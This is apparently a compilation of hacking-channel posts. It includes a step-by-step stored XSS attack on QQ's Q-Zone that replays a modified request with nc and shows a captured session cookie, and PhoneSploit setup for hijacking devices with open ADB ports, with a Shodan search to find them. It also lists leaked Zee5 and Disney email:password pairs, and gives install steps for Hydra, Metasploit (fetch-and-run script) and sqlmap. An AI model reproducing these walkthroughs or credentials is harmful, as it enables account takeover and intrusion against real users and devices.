🦑 paid popular pdfs :)

🦑you can get some hacker/cyber news their

twitter.com/undercodeNews

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode

1_ -Zone filters user input

After entering the Q-Zone, click "Settings → Space Settings →q Space Name" in turn, where the display name of the space can be modified. If we write an executable script code, as long as the filtering is not strict, it will also be saved in the home page, and the execution code is called to attack the browser. Let's first test whether we can write cross-site scripts in this input box:

2) When entering the above code "<script> alert (" test ") </ script>" in the "Input Space Name" input box, I found that the length of the input characters was limited in the input box, and only 24 characters could be entered in total. And when we enter the code of the permitted length, after clicking Submit, a dialog box of "Please do not include" <> etc. characters in the input "will pop up. It seems that Q-Zone filters the user's input.

3) Check the input filtering method of Q-Zone

Click "View → Source File" on the Q-Zone page. At the beginning of the code segment, you can see the following code segment:

if (! checkFormValue (form1)) return false;
len = StrLenOfAscii (form1.spacename.value) / 2;
if (len> 12) {

4) Users with a little ASP programming foundation, I believe they can understand this code? Through the "StrLenOfAscii ()" function in the code, the length of the user input data ASC Ⅱ code is obtained, and the value is assigned to the len variable after dividing by 2. If the following code detects that the length of the len variable is greater than 12, it prompts that the name is too long. The most important one is the previous sentence: "if (! CheckFormValue (form1)) return false", where the "checkFormValue ()" function can obviously be inferred to detect whether the input data contains special characters. When it is detected that the data contains filtered characters, the aforementioned dialog box pops up.

5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting


1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.

2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe → ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.

3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:

4) "Content-Length: 20

Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ​​= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g

spacename = 1234567890 "

"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.

3) Modify the submitted data

After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"

4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.

Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.

> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .

5) Examine the results of code execution

Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linux✅

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/Zucccs/PhoneSploit

2) extract adb.rar to the phonesploit directory

3) cd PhoneSploit

4) pip install colorama

5) python2 main.py

6) IF ADB NOT FOUND
sudo apt update sudo apt install android-tools-adb android-tools-fastboot


7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3A”Android+Debug+Bridge”

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Ransomware attacks the largest U.S. ATM supplier-NEWS

1) Diebold Nixdorf, the largest ATM supplier in the United States, was attacked by ransomware .

2) The company stated that hackers failed to access ATMs or customer networks and only affected their corporate networks. Diebold has 35,000 employees and its ATM machine has an estimated global market share of 35%. It also produces point-of-sale systems and software used by retailers.

3) The attack occurred on the evening of April 25. The security team detected abnormal behavior on the corporate network, and it immediately took action to isolate the system in the network and prevent the spread of malicious programs. The company said the ransomware did not affect its customer network. What hacked into Diebold's corporate network was ransomware called ProLock. Diebold said it did not pay the ransom to the attackers. Security experts say it may be better to do so, because the current version of ProLock decryption tools can damage large files such as databases.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Zee5 Accounts

abbasmanas@gmail.com:zahra786
aavanthireddy@gmail.com:rskr@avn2011
abhi.basant26@gmail.com:abybaby26

🦑 Disney Accounts

megkatherine@yahoo.com:arzadhare1
dasilvacassandra25@gmail.com:sdsdc2d

🦑 expert hacking

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Block Wii U System Updates (Without DNS Blocking!)


🦑Requirements:

> A Wii U & SD: Firmware and SD size doesn't matter as long as you satisfy the other conditions
Mocha Or Haxchi
> HBL on SD card
>ftpiiu_everywhere (Haxchi) on SD card
>Access to HBL: Browserhax, Haxchi/CBHC, or any other form of entry point, are all fine. As long as you access it.
>A PC with FTP Client: Technically it doesn't have to be a PC. It can even be done on your phone with an FTP Client. I'm using the PC for the simplicity of it. FileZilla IS RECOMMENDED.
Optional: Use Nand Dumper to back up your nand with all it's contents, as well as dumping the OTP and SEEPRPOM. By having those, you can unbrick your system with a hardmod at any point. Dumping MLC will require a 64GB SD card if your Wii U is 32GB, or 16GB SD card if your Wii U is 8GB.

A1) Using Haxchi/CBHC:

System Menu: Have Haxchi reboot to System menu.
System Menu: Launch HBL via Haxchi or browser.
HBL: Launch ftpiiu_everywhere.

2) Proceed to section of the guide to block updates. Proceed to section

"3)" if you want to unblock them again.

B) Using Mocha:
1) System Menu: Launch HBL via browser.
2) HBL: Start Mocha (Using default values are fine)
3) System Menu: Launch HBL via browser again.
4) HBL: Launch ftpiiu_everywhere.
5) Proceed to section "

6) Modifying your Nand, and blocking updates:
7) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
8) PC: Once connected, Navigate to: "storage_mlc/sys/"

9) PC: Locate "update" folder, right-click it and Pick "File Permissions". Make sure it's the same as the screenshot below. If it's not the same, then make note of that. You will need it if you want to enable updates later. If it's the Same, then proceed to the next Step.

now :
1) PC: Delete “update” folder.

2) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.

3) Wii U: Exit Mii Maker, and click on system settings.

4) System Settings: Attempt to update your Wii U as Normal. A few seconds after it starts and the progress bar appears, it should give out this error code: 105-3012. If the progress bar actually continues to move, TURN OFF THE WII U IMMEDIATELY!! Recheck your steps, cause something went wrong.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Unblocking updates of WiU:

If for whatever reason, you would like to return the Wii U to it's original updating state, start by following "1A)" or "1B)" of the guide, then proceed to the next step of this section:

1) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.

2) PC: Once connected, Navigate to: "storage_mlc/sys/"

3) PC: Right-click, and select "Create Directory". Create “update” folder. Once created, right-

4) click again, and select "File Permissions".

5) PC: When you originally did section > , if your permissions were the same as the screenshot in that section, enter those same permissions here. If not, then you should have noted them down somewhere. Enter those values instead, then click ok.

6) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.

7) Wii U: Exit Mii Maker, and click on system settings.

8) System Settings: Attempt to update your Wii U as Normal. It should proceed to update normally.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install Nmap in Termux

You can install Nmap in Termux just by typing a few commands
If you have already installed Termux from play store then open Termux and type below command

1) termux-setup-storage

You will be asked to give permission to Termux for storage access

After that type below command

2) apt update && apt upgrade
After that you will be asked to update packages to newer packages, so simply type y for yes and hit enter

3) To install Nmap you have to type below command

pkg install nmap

That's all you have successfully installed nmap in Termux

🦑 Hydra for Termux
As you know hydra is a powerful brute force tool to guess and crack valid passwords, let's see how we can install it on Termux

How to install and use hydra in Termux
Hydra can be installed in Termux just by typing below command

> pkg install hydra

After installing hydra, you can use hyrda by typing hydra in Termux

🦑 Metasploit For Termux


Metasploit is an advanced hacking tool, which is now available for Termux, let's see how to install Metasploit in Termux

We can install Metasploit in Termux by various methods but i recommend you to install it by one automatic

🦑How to install and use Metasploit in Termux

To install Metasploit in Termux just type below commands

1) cd $HOME

Then type

2) pkg install wget

Then type

3) wget https://Auxilus.github.io/metasploit.sh

Finally type

4) bash metasploit.sh

That's all you have successfully installed Metasploit in Termux
To use Metasploit just type below command

./msfconsole

🦑Sqlmap for Termux
Sqlmap is a powerful tool for SQL injection scanning and database dumping of websites


You can install it by typing few commands

Firstly install git by typing

1) pkg install git

Then type below command

2) git clone https://github.com/sqlmapproject/sqlmap

then install python2 in Termux by typing below command

3) pkg install python2

Finally goto sqlmap folder by typing cd sqlmap

Finally type below command to run sqlmap

4) python2 sqlmap.py